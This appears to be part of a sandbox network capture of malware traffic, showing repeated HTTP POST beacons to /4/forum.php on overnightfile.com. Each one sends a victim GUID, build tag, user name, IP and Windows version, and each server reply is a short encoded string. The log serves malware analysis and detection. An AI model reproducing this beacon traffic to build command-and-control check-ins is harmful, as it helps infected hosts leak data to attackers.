                                                                                                                                      Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZMNAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.548130989 CEST807OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:11.638955116 CEST807INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.986920118 CEST807OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:12.075288057 CEST808INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZZAAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:12.376663923 CEST808OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:12.464622974 CEST808INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTCXGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:12.955755949 CEST809OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:13.046689034 CEST809INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYNMBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:13.388264894 CEST810OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:13.479176998 CEST810INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJJQQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:13.928440094 CEST810OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:14.019418001 CEST811INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:14.396789074 CEST811OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:14.489926100 CEST811INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBHSYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:15.137546062 CEST812OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:15.231205940 CEST812INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:14 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZFUAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:15.920120001 CEST813OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:16.016776085 CEST813INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQTGJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:16.324270964 CEST813OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:16.419513941 CEST814INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:16 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHAZSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:16.756951094 CEST814OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:16.848412991 CEST814INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:16 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4e 4d 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFNMUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:17.157701969 CEST815OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:17.248116970 CEST815INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:16 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 48 53 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVHSEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:17.539499998 CEST815OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:17.629945993 CEST816INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 42 59 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTBYGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:17.947969913 CEST816OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:18.045984030 CEST816INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4a 51 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGJQTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:18.495517969 CEST817OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:18.591042995 CEST817INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTAZGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:18.911391020 CEST818OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.008234978 CEST818INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4e 4d 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFNMUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:19.344836950 CEST819OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.443614960 CEST819INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVJQEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:19.814433098 CEST820OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
